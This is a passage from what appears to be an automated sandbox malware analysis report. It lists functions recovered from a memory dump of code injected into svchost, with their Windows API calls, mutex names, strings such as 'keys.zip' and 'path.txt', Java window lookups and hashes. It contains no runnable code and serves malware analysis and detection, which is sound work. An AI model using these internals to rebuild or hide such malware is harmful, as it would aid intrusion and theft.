                                                                                                                                                                                                            • Instruction Fuzzy Hash: E101A971FC02516FBB0E97B4DC436A2775DAF80B51B040BB6E412E3180DBA08A108561
                                                                                                                                                                                                            Function 02C8A300 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C8A366
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da3b2,ALPHA), ref: 02C8A380
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da3b2$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 4280258085-877562529
                                                                                                                                                                                                            • Opcode ID: 80761793af32adadccc08d11091c2edfdfc4dc98b57416fe8d9733845e4c6d5b
                                                                                                                                                                                                            • Instruction ID: 66065183afabc5e205905a98ee6f42eaf75174fc29e32019c41c5dc9de667fcd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80761793af32adadccc08d11091c2edfdfc4dc98b57416fe8d9733845e4c6d5b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F0C8319C478076E30377619C0EF5A779CBF49B19F048619F55AA3181DBB4E9048B7B
                                                                                                                                                                                                            Function 02C918D0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C91936
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA718,RFK), ref: 02C91950
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6D1DA718$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                            • API String ID: 4280258085-3948127742
                                                                                                                                                                                                            • Opcode ID: 50ff971ec6fb5c5cafd525f8d5ef67f4af66823a64cf0cd0a346fc3ec5b13101
                                                                                                                                                                                                            • Instruction ID: 141189960a55e461df8e06af9ff8a9f56ae7c7247c1961c10fdf04627f25ceb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50ff971ec6fb5c5cafd525f8d5ef67f4af66823a64cf0cd0a346fc3ec5b13101
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EF0F9309C47827AE60257614C1FF1A37DD6F44B59F094664F51663180DBF0951086AA
                                                                                                                                                                                                            Function 02C8E890 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E8F6
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da208,HANDY), ref: 02C8E910
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da208$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 4280258085-2176744899
                                                                                                                                                                                                            • Opcode ID: bbf26cff921429fc15a84b544844029a10b92a237402795641b3290510035523
                                                                                                                                                                                                            • Instruction ID: 6cb507c3f8e8aa611efe161f5ac436fe0354e7091d39b52a75f674d21e25321d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbf26cff921429fc15a84b544844029a10b92a237402795641b3290510035523
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FF0D1309C4741BAF21277658C0AF1E369C6F85B18F048664F905A2082DBB4A5108AAB
                                                                                                                                                                                                            Function 02C80A70 Relevance: 17.9, APIs: 14, Instructions: 355COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
                                                                                                                                                                                                            • Instruction ID: e9425d0ca37bfb561863d8c25653af8c558fe77ebd5fc73c7aa99de3bacac200
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42C1D631A006169FCB15DF68C8A4BBE7BB5EF85318F14C294ED569B340E731AA0DCB90
                                                                                                                                                                                                            Function 02C7B390 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WindowFromDC.USER32(?), ref: 02C7B39C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7B3D4
                                                                                                                                                                                                            • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02C7B3E2
                                                                                                                                                                                                            • GetClipRgn.GDI32(?,00000000), ref: 02C7B3EC
                                                                                                                                                                                                            • SelectClipRgn.GDI32(00000000,00000000), ref: 02C7B3FC
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02C7B403
                                                                                                                                                                                                            • GetViewportOrgEx.GDI32(?,?), ref: 02C7B40E
                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02C7B422
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7B463
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 3315380975-465009422
                                                                                                                                                                                                            • Opcode ID: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
                                                                                                                                                                                                            • Instruction ID: fa693be15dccf9b0968d71d7f8b39fe227df8554a4e78187f550de969f190dc2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5941E7B6640245ABCB14CF99DC84EAB77BDEF8C715F108A59FA19D3240D630EC51CBA0
                                                                                                                                                                                                            Function 02C928B8 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 118synchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da759), ref: 02C928D7
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da759,?,?), ref: 02C92969
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02C929F5
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C92A06
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C92A0D
                                                                                                                                                                                                              • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
                                                                                                                                                                                                              • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                            • String ID: 6d1da759$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 3621236684-3468678509
                                                                                                                                                                                                            • Opcode ID: 6662977885a8421e18f6af644ab4a01a33225e6860766ebb42bd12c63e0eec3a
                                                                                                                                                                                                            • Instruction ID: 68b0bd38cb0a6921277f2db676b60a575a159409839778f83137e24ce36cf823
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6662977885a8421e18f6af644ab4a01a33225e6860766ebb42bd12c63e0eec3a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A41E8319445DA5FDB17CB28982C7E6BBE5AF89300F1886D9DCC9DB201DB718A48C791
                                                                                                                                                                                                            Function 02C93840 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 02C9386E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C93882
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02C84480), ref: 02C93893
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C938A3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938E0
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02C84480), ref: 02C938E3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938F0
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02C84480), ref: 02C938F3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FileHandle$FreeValidate$AddressAllocateCloseCountCreateHeaderImageInformationModuleProcReadSizeTickWritememset
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1403775172-3277137149
                                                                                                                                                                                                            • Opcode ID: 0f724954e1104db53d25ed058d3cccfce3948f48a115a77b501287c6e6e1cb74
                                                                                                                                                                                                            • Instruction ID: 0ccaee5bb5eef121bf02499105de3754658da8f2b413a91fad157d137fb16431
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f724954e1104db53d25ed058d3cccfce3948f48a115a77b501287c6e6e1cb74
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7311B631E842916FEB169BB5DC0DF9BBBACEF84751F0446A5F905D3280DB34D610CAA1
                                                                                                                                                                                                            Function 02C8EAD0 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB83E0), ref: 02C8EAE1
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB8418), ref: 02C8EAF1
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB8448), ref: 02C8EB01
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB8468), ref: 02C8EB11
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB83E0), ref: 02C8EB21
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB8418), ref: 02C8EB31
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB8448), ref: 02C8EB41
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB8468), ref: 02C8EB51
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FindWindow
                                                                                                                                                                                                            • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                            • API String ID: 134000473-1757792087
                                                                                                                                                                                                            • Opcode ID: b201d23f41094976b1edccc0699267d55eb7bd535f81bef550611750ab442811
                                                                                                                                                                                                            • Instruction ID: 9fae9017ba22f8d1d135ea2ad7290c95713231852abeed899d7bb493b7186d8a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b201d23f41094976b1edccc0699267d55eb7bd535f81bef550611750ab442811
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F00D257C532665762232692D32FEA0B8C5D91D8EF058271BA17A3008E6A095424CF9
                                                                                                                                                                                                            Function 02C8A318 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C8A366
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da3b2,ALPHA), ref: 02C8A380
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da3b2$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 4280258085-877562529
                                                                                                                                                                                                            • Opcode ID: 7614bdbaed2c3d353d408fa2d3712f5e85987458b25ca0920f5b06845d17d4d4
                                                                                                                                                                                                            • Instruction ID: de14a1f6760cce9f69a8307fc09907b038dd5766c2de6a09dfb1e88f9bf87ab6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7614bdbaed2c3d353d408fa2d3712f5e85987458b25ca0920f5b06845d17d4d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FCF0A7319C47906AF7237B619C0EB5A77DC7F89B19F008519F94A93180D7B4C5048B67
                                                                                                                                                                                                            Function 02C918E8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C91936
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA718,RFK), ref: 02C91950
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6D1DA718$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                            • API String ID: 4280258085-3948127742
                                                                                                                                                                                                            • Opcode ID: 7d62ca8156109f4692c760b78fded2693496623159fffe5dc9672ef756f99eff
                                                                                                                                                                                                            • Instruction ID: 004c4aa86e14d2b73aa9941bbbb29204516ae7021b9d9f6747053e188e05d585
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d62ca8156109f4692c760b78fded2693496623159fffe5dc9672ef756f99eff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14F082309C83926EF6225B619C2EF5E37DD6F45B09F098568F90AA2140D7F081158B67
                                                                                                                                                                                                            Function 02C8E8A8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E8F6
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da208,HANDY), ref: 02C8E910
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da208$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 4280258085-2176744899
                                                                                                                                                                                                            • Opcode ID: d9c0ffe1b21f23b5c948dd390bc40a336df9ccfcf61badfca65350155e741a86
                                                                                                                                                                                                            • Instruction ID: 50f4a4625df6a55b3e4d748a1960cbe6f7a8e024a5b950663cb031bbaddc7270
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9c0ffe1b21f23b5c948dd390bc40a336df9ccfcf61badfca65350155e741a86
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEF082309C43516AF362AB608C0EB5E37DC6F49B0DF048554F906A2081DBB481108B6B
                                                                                                                                                                                                            Function 02C7F0C0 Relevance: 16.6, APIs: 11, Instructions: 115memorynetworkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F1D5
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 02C7F1E9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
